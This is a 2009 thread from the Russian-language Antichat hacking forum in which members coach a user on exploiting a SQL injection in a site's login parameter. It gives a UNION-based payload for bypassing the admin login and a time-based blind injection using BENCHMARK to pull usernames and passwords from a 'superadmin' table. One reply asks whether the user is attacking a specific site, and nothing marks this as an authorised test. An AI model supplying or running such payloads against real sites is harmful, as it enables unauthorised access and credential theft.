ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #7441  
Старый 03.06.2009, 17:33
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

2 SeNaP
уязвимый параметр login, крути как слепую, т.к. еще вывода нету, то придется заюзать бенчмарк

Последний раз редактировалось Iceangel_; 03.06.2009 в 17:38..
 

  #7442  
Старый 03.06.2009, 17:33
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

2 SeNaP

Там то, что вернет запрос (пароль) должно соответствовать тому, что в переменной p

При волшебных_кавычках = офф

login.php?login=-1'+union+select+123--+&p=123

Вроде так, если я не накосячил
 

  #7443  
Старый 03.06.2009, 18:56
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

Понял одно, что один уязвимый параметр это login

Последний раз редактировалось SeNaP; 03.06.2009 в 19:00..
 

  #7444  
Старый 03.06.2009, 19:37
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

А чего те не понятно....
Товарищь Iceangel_ тебе же написал....
Цитата:
Iceangel_
уязвимый параметр login, крути как слепую, т.к. еще вывода нету, то придется заюзать бенчмарк
 

  #7445  
Старый 03.06.2009, 19:51
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

Можете хотябы пример написать как крутить.... пожалуйсто

Последний раз редактировалось SeNaP; 03.06.2009 в 19:54..
 

  #7446  
Старый 03.06.2009, 20:02
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

SeNaP, откуда этот код ? Ты конкретный сайт хекаешь ? Кинь ссылку сюда либо мну в пм либо попробуй сам то что я написал

.php?login=-1'+union+select+123--+&p=123

Ты должен попасть в админку (но только если magic_quotes_gpc=off)
 

  #7447  
Старый 03.06.2009, 20:11
zifanchuck
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393

Репутация: 464
Отправить сообщение для zifanchuck с помощью ICQ
По умолчанию

плизз дайте кто ссылку на сервис для перевода в чар и sql hash (типа 0x3a).

все спомнил))) если надо то вот x3k.ru
 

  #7448  
Старый 03.06.2009, 20:15
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

Цитата:
плизз дайте кто ссылку на сервис для перевода в чар и sql hash (типа 0x3a).
вот хороший сервис....
http://noxak.ru/tools/
 

  #7449  
Старый 03.06.2009, 20:16
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

все же советую сделать как ElteRUS, более рационально, чтобы попасть именно в админку, но если ты захочешь юзать скуль для других целей, вот тебе пример запроса
Цитата:
?login=999'+or+if(ascii(substring ((select+concat_ws(0x3a,login,pass)+from+superadmi n+limit+0,1),1,1))>1,BENCHMARK(1000000,md5(current_date)),2)--+
в случае истинности условия, ответ от сервера будет приходить с запозданием
 

  #7450  
Старый 03.06.2009, 20:29
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

Цитата:
Сообщение от Iceangel_  
все же советую сделать как ElteRUS, более рационально, чтобы попасть именно в админку, но если ты захочешь юзать скуль для других целей, вот тебе пример запроса

в случае истинности условия, ответ от сервера будет приходить с запозданием
Чёт не какой ошибки, сервер работает без опоздания
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ